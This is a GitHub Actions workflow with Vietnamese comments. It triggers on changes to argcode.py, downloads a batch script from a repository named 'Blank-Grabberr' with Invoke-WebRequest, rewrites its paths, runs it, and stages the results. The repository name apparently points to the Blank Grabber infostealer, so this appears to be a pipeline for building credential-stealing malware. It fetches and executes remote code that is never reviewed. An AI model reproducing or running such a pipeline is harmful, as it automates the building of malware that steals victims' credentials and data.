name: Build and Stage Changes

on:
  push:
    paths:
      - 'argcode.py'  # Theo dõi sự thay đổi của file argcode.py

jobs:
  build:
    runs-on: windows-latest
    
    steps:
      - name: Checkout code
        uses: actions/checkout@v3

      - name: Download build.bat
        run: Invoke-WebRequest -Uri https://raw.githubusercontent.com/adasdasdsaf/Blank-Grabberr/main/build/buildmy.bat -OutFile build.bat

      - name: Modify build.bat
        run: |
          # Thay thế đường dẫn trong build.bat bằng %cd%
          (Get-Content build.bat) | ForEach-Object { $_ -replace 'D:\\v\Blank-Grabberr\\', '.\\' } | Set-Content build.bat
          (Get-Content build.bat) | ForEach-Object { $_ -replace 'D:/v/Blank-Grabberr/', './' } | Set-Content build.bat

      - name: Run build.bat
        run: .\build.bat

      - name: Stage changes
        run: git add .
